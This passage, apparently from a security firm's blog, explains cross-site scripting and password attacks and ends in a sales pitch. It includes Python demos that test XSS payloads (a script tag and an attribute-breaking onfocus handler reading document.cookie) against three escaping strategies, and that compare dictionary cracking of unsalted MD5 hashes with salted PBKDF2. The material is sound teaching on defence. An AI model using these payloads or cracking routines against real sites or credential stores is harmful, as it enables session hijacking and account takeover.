There are three types of cross-site scripting. Reflected (non-persistent) XSS, the most commonly reported, puts the payload in a request (a crafted link or form submission) that the server echoes straight back in its response; to exploit it, attackers craft malicious links or phishing emails that trick victims into sending the poisoned request. Stored (persistent) XSS saves the payload in the application (a comment, profile field or message) so it is served to everyone who views that content. DOM-based XSS arises when client-side JavaScript inserts attacker-controlled data into the page without the server ever seeing it.
What impact is it having on businesses?
Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account. XSS can also impact a business’s reputation. An attacker can deface a corporate website by altering its content, thereby damaging the company’s image or spreading misinformation.
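Whether the injected script is “trusted” by the browser depends entirely on how the server encodes user data for the spot in the page where it lands. The Python below is an added example, not code from the original post: it renders a constructed search-results fragment three ways (no escaping, angle brackets only, and context-appropriate escaping with quotes), then audits each result with the standard-library HTML parser to see whether a `<script>` element or an `on*` event-handler attribute actually came into existence. The payloads are constructed and the page template is an assumption for the demonstration.

```python
import html
from html.parser import HTMLParser


def render_vulnerable(term: str) -> str:
    # Raw interpolation into both a text node and a double-quoted attribute.
    return f'<p>Results for: {term}</p>\n<input name="q" value="{term}">'


def render_angle_only(term: str) -> str:
    # A common half-fix: escape < > & but leave quotes alone. The text node is now
    # safe, but a " in the input still closes the attribute and opens a new one.
    t = html.escape(term, quote=False)
    return f'<p>Results for: {t}</p>\n<input name="q" value="{t}">'


def render_safe(term: str) -> str:
    # Escaping that covers both HTML text and double-quoted attribute values.
    t = html.escape(term, quote=True)
    return f'<p>Results for: {t}</p>\n<input name="q" value="{t}">'


class _Audit(HTMLParser):
    """Counts <script> elements and on* handler attributes the way a browser's parser would see them."""

    def __init__(self):
        super().__init__()
        self.scripts, self.handlers = 0, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(page: str) -> dict:
    a = _Audit()
    a.feed(page)
    a.close()
    return {"scripts": a.scripts, "handlers": a.handlers}


# Constructed payloads: one aimed at the text-node context, one at the attribute context.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("angle-only", render_angle_only),
                         ("safe", render_safe)):
        print(f"{name:11} script payload -> {audit(render(SCRIPT_PAYLOAD))}")
        print(f"{name:11} attr payload   -> {audit(render(ATTR_PAYLOAD))}")
```

The attribute payload needs no `<` at all, which is why “strip angle brackets” filters fail. Templating engines that auto-escape (Jinja2 with autoescape on, Django templates) apply the `render_safe` behaviour by default; the remaining risks are places where a developer marks output as safe, injects into a JavaScript or URL context that needs its own encoding, or builds the DOM client-side from untrusted data.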
- Password Attacks
What is it?
Password attacks are one of the most common causes of corporate and personal data breaches. A password attack is simply a hacker trying to obtain your password, whether by tricking you into typing it into a page they control, by guessing it, or by reusing one leaked from somewhere else. In 2022, 81% of data breaches were due to compromised credentials.
How Does it Work?
Criminals obtain passwords through phishing, MITM attacks and similar techniques that get the victim to type their password into a fake page the criminal can read, or by guessing and replaying credentials at scale against login pages or stolen password hashes.
What Types Are There?
In addition to phishing and MITM attacks, criminals use brute-force, dictionary, keylogging and credential-stuffing attacks.
- Phishing. You get an email from what looks like goodwebsite.com asking you to reset your password, but you didn’t read the address closely and it is actually goodwobsite.com. You “reset your password” and the hacker steals your credentials.
- Brute force. If a password is a key that opens a door, a brute-force attack is a battering ram: combinations are tried until one works. Against stolen password hashes, cracking rigs can test billions of guesses per second when the hashes are fast and unsalted (the often-quoted figure of 2.18 trillion username/password combinations in 22 seconds describes this offline setting), so a simple password falls within seconds. Against a live login, rate limiting and lockouts slow the attacker down, which is why attackers prefer stolen hashes or credential stuffing.
- Dictionary. A brute-force variant that tries words, names and common passwords, with predictable variations such as capitalising the first letter or appending a year and a symbol, before resorting to random combinations.
- Keylogging. Malware records keystrokes and sends the captured passwords to the attacker.
- Credential stuffing. Username/password pairs leaked from one breach are replayed against other sites, exploiting password reuse.
What impact is it having on businesses?
In 2021, attackers used a range of password attack types, but brute force was involved in more than 60% of the breaches attributed to them.
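Why the brute-force and dictionary numbers above are so lopsided in the attacker’s favour comes down to how passwords are stored. The Python below is an added example, not code from the original post: it runs the same small constructed wordlist against a legacy store of unsalted MD5 hashes and against a store using salted PBKDF2-HMAC-SHA256 from the standard library, counting the work each requires. The accounts, passwords, wordlist and iteration count are assumptions for the demonstration; the iteration count is kept low so the example runs in a second or two, and real deployments should follow current guidance for the algorithm they pick.

```python
import hashlib
import hmac
import os

WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2023!", "dragon"]  # constructed
ITERATIONS = 100_000  # assumed work factor; tune to your hardware and guidance


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted(stored: dict, wordlist) -> dict:
    """Unsalted fast hash: hash the wordlist once, then look every account up in the table.
    The cost is len(wordlist) hashes regardless of how many accounts there are."""
    table = {md5_hex(w): w for w in wordlist}
    return {user: table[h] for user, h in stored.items() if h in table}


def pbkdf2_store(password: str, salt: bytes = b"", iterations: int = ITERATIONS) -> str:
    """Salted, iterated hash in a self-describing record: alg$iterations$salt$digest."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    _alg, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def crack_salted(stored: dict, wordlist):
    """Salted slow hash: no shared table, so every account costs up to len(wordlist)
    derivations, each of them ITERATIONS times slower than a single MD5."""
    found, derivations = {}, 0
    for user, record in stored.items():
        for word in wordlist:
            derivations += 1
            if pbkdf2_verify(word, record):
                found[user] = word
                break
    return found, derivations


# Constructed accounts; carol's passphrase is not in the wordlist.
ACCOUNTS = {"alice": "Summer2023!", "bob": "password", "carol": "correct-horse-battery-staple"}


def legacy_db() -> dict:
    return {u: md5_hex(p) for u, p in ACCOUNTS.items()}


def hardened_db() -> dict:
    return {u: pbkdf2_store(p) for u, p in ACCOUNTS.items()}


if __name__ == "__main__":
    print("unsalted MD5 :", crack_unsalted(legacy_db(), WORDLIST), "after", len(WORDLIST), "hashes")
    found, work = crack_salted(hardened_db(), WORDLIST)
    print("salted PBKDF2:", found, "after", work, "derivations of", ITERATIONS, "iterations each")
```

Both stores give up the two weak passwords, which is the point the page’s figures make: hashing does not rescue a guessable password. What the salt and the work factor change is the economics for everyone else, because the attacker can no longer precompute one table for the whole database and each guess costs a hundred thousand hash operations instead of one. Slow hashing protects the stored credentials; rate limiting, lockouts and multi-factor authentication are what protect the live login.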
Conclusion
It’s essential to be aware of the many different types of malware and the attack techniques that deliver it, how they work, and the damage they can cause, as part of securing any online infrastructure. Cybercriminals keep creating new forms of malicious software and refining their tactics, and these often go unnoticed by traditional defences.
The 16 most common types of malware are a good starting point for businesses seeking advice on identifying and handling malware threats. If you’re looking for a full-service IT risk management solution with experienced security professionals who understand these threats, call us today. We’ll be happy to provide further assistance with critical detection, prevention, and analysis services to help secure your systems from potential damage caused by these malicious infections. With the right knowledge and resources at your disposal, you can always stay one step ahead of cybercriminals and their malware attacks.